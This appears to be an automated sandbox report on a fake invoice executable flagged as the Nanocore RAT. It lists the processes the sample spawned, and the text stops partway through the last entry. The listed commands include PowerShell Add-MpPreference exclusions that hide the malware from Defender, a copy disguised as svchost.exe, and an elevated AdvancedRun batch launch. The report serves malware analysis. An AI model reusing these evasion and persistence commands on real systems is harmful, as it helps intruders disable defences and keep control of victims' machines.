                                                                                                                                                                Last-Modified: Mon, 22 Feb 2021 04:01:39 GMT
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                cf-request-id: 086a16429f00000b6375246000000001
                                                                                                                                                                Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ryBWoADTjtuhHg5oD%2BjCDj1TR6kUqYe%2BZURubDEuTPm7HmmItoa%2FWiga8j%2BTEQvtFQJG4%2Bu0yrrA7rg9KKpXP3KoK3R7B3lp3GHAKzDGY9TshZwf"}],"group":"cf-nel"}
                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 6256bfe4384d0b63-AMS
                                                                                                                                                                Data Raw: 61 36 38 0d 0a 3c 70 3e 68 75 46 52 68 46 68 75 46 75 68 46 68 6a 52 68 46 68 75 46 75 68 46 68 75 75 54 68 46 68 4d 4d 68 46 68 75 75 74 68 46 68 75 46 54 68 46 68 75 75 4b 68 46 68 75 75 6a 68 46 68 75 46 54 68 46 68 75 75 75 68 46 68 75 75 46 68 46 68 46 68 46 68 46 68 46 68 52 4b 68 46 68 75 75 47 68 46 68 75 75 46 68 46 68 52 46 68 46 68 75 46 75 68 46 68 6a 6a 68 46 68 75 75 74 68 46 68 4d 47 68 46 68 4d 52 68 46 68 4d 47 68 46 68 46 68 46 68 46 68 46 68 74 52 68 46 68 52 68 46 68 75 68 46 68 47 46 68 46 68 75 46 54 68 46 68 75 46 52 68 46 68 75 46 75 68 46 68 52 6a 68 46 68 75 46 75 68 46 68 75 75 74 68 46 68 75 75 54 68 46 68 75 46 54 68 46 68 75 75 75 68 46 68 75 75 46 68 46 68 46 68 46 68 46 68 46 68 74 4d 68 46 68 74 6a 68 46 68 74 52 68 46 68 74 6a 68 46 68 74 52 68 46 68 74 6a 68 46 68 74 52 68 46 68 46 68 46 68 6a 4b 68 46 68 75 54 68 46 68 75 68 46 68 47 4c 68 46 68 75 75 46 68 46 68 75 75 6a 68 46 68 75 46 75 68 46 68 75 75 74 68 46 68 75 75 46 68 46 68 4d 47 68 46 68 75 46 52 68 46 68 47 52 68 46 68 4d 47 68 46 68 75 46 4d 68 46 68 75 46 75 68 46 68 46 68 46 68 52 4b 68 46 68 75 75 47 68 46 68 75 75 46 68 46 68 52 46 68 46 68 75 46 75 68 46 68 6a 6a 68 46 68 75 75 74 68 46 68 4d 47 68 46 68 4d 52 68 46 68 4d 47 68 46 68 74 6a 68 46 68 75 46 46 68 46 68 75 46 52 68 46 68 75 46 52 68 46 68 46 68 46 68 46 68 46 68 47 4b 68 46 68 75 52 68 46 68 75 68 46 68 47 6a 68 46 68 75 46 75 68 46 68 75 46 4c 68 46 68 4d 47 68 46 68 75 46 52 68 46 68 6a 47 68 46 68 75 75 75 68 46 68 75 75 4b 68 46 68 75 4b 75 68 46 68 75 75 74 68 46 68 75 46 54 68 46 68 75 46 4c 68 46 68 75 46 74
                                                                                                                                                                Data Ascii: a68<p>huFRhFhuFuhFhjRhFhuFuhFhuuThFhMMhFhuuthFhuFThFhuuKhFhuujhFhuFThFhuuuhFhuuFhFhFhFhFhFhRKhFhuuGhFhuuFhFhRFhFhuFuhFhjjhFhuuthFhMGhFhMRhFhMGhFhFhFhFhFhtRhFhRhFhuhFhGFhFhuFThFhuFRhFhuFuhFhRjhFhuFuhFhuuthFhuuThFhuFThFhuuuhFhuuFhFhFhFhFhFhtMhFhtjhFhtRhFhtjhFhtRhFhtjhFhtRhFhFhFhjKhFhuThFhuhFhGLhFhuuFhFhuujhFhuFuhFhuuthFhuuFhFhMGhFhuFRhFhGRhFhMGhFhuFMhFhuFuhFhFhFhRKhFhuuGhFhuuFhFhRFhFhuFuhFhjjhFhuuthFhMGhFhMRhFhMGhFhtjhFhuFFhFhuFRhFhuFRhFhFhFhFhFhGKhFhuRhFhuhFhGjhFhuFuhFhuFLhFhMGhFhuFRhFhjGhFhuuuhFhuuKhFhuKuhFhuuthFhuFThFhuFLhFhuFt


                                                                                                                                                                Code Manipulations

                                                                                                                                                                Statistics

                                                                                                                                                                CPU Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Memory Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                Analysis Process: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604 Parent PID: 5776

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:10
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe'
                                                                                                                                                                Imagebase:0x80000
                                                                                                                                                                File size:206848 bytes
                                                                                                                                                                MD5 hash:A656F522F604872E02DAEE9DBC458D9C
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: powershell.exe PID: 1552 Parent PID: 5604

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:27
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                File size:430592 bytes
                                                                                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: svchost.exe PID: 2564 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:27
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: conhost.exe PID: 5856 Parent PID: 1552

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:27
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: AdvancedRun.exe PID: 5380 Parent PID: 5604

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:28
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:91000 bytes
                                                                                                                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 3%, Metadefender, Browse
                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: AdvancedRun.exe PID: 6268 Parent PID: 5380

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:32
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /SpecialRun 4101d8 5380
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:91000 bytes
                                                                                                                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: svchost.exe PID: 6356 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:37
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: svchost.exe PID: 6364 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:37
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: svchost.exe PID: 6484 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:38
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: powershell.exe PID: 6496 Parent PID: 5604

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:38
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force
                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                File size:430592 bytes
                                                                                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: explorer.exe PID: 6508 Parent PID: 3472

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:39
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
                                                                                                                                                                Imagebase:0x7ff693d90000
                                                                                                                                                                File size:3933184 bytes
                                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: conhost.exe PID: 6540 Parent PID: 6496

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:39
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: cmd.exe PID: 6552 Parent PID: 5604

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:39
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                                                                                                Imagebase:0xaf0000
                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: conhost.exe PID: 6560 Parent PID: 6552

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:39
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: svchost.exe PID: 6700 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:40
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: timeout.exe PID: 6752 Parent PID: 6552

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:40
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:timeout 1
                                                                                                                                                                Imagebase:0x10d0000
                                                                                                                                                                File size:26112 bytes
                                                                                                                                                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: explorer.exe PID: 6772 Parent PID: 792

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:41
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                Imagebase:0x7ff693d90000
                                                                                                                                                                File size:3933184 bytes
                                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: svchost.exe PID: 6944 Parent PID: 6772

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:43
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
                                                                                                                                                                Imagebase:0xd50000
                                                                                                                                                                File size:206848 bytes
                                                                                                                                                                MD5 hash:A656F522F604872E02DAEE9DBC458D9C
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 26%, ReversingLabs

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: svchost.exe PID: 6964 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:43
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: explorer.exe PID: 7092 Parent PID: 3472

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:47
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
                                                                                                                                                                Imagebase:0x7ff693d90000
                                                                                                                                                                File size:3933184 bytes
                                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: CasPol.exe PID: 7108 Parent PID: 5604

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:48
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                                                                                                                                                                Imagebase:0x910000
                                                                                                                                                                File size:107624 bytes
                                                                                                                                                                MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: explorer.exe PID: 7152 Parent PID: 792

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:50
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                Imagebase:0x7ff693d90000
                                                                                                                                                                File size:3933184 bytes
                                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: svchost.exe PID: 4568 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:49
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: WerFault.exe PID: 4560 Parent PID: 4568

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:50
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604
                                                                                                                                                                Imagebase:0xd90000
                                                                                                                                                                File size:434592 bytes
                                                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: svchost.exe PID: 6172 Parent PID: 7152

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:51
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
                                                                                                                                                                Imagebase:0x4c0000
                                                                                                                                                                File size:206848 bytes
                                                                                                                                                                MD5 hash:A656F522F604872E02DAEE9DBC458D9C
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: WerFault.exe PID: 6188 Parent PID: 5604

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:51
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 2060
                                                                                                                                                                Imagebase:0xd90000
                                                                                                                                                                File size:434592 bytes
                                                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: svchost.exe PID: 4528 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:46:08
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: powershell.exe PID: 5584 Parent PID: 6944

                                                                                                                                                                General

                                                                                                                                                                Start time:07:46:35
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
                                                                                                                                                                Imagebase:0x7ff64e5e0000
                                                                                                                                                                File size:430592 bytes
                                                                                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: conhost.exe PID: 5440 Parent PID: 5584

                                                                                                                                                                General

                                                                                                                                                                Start time:07:46:35
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: svchost.exe PID: 6684 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:46:41
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: AdvancedRun.exe PID: 844 Parent PID: 6944

                                                                                                                                                                General

                                                                                                                                                                Start time:07:46:41
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe
                                                                                                                                                                Wow64 process (32bit):true
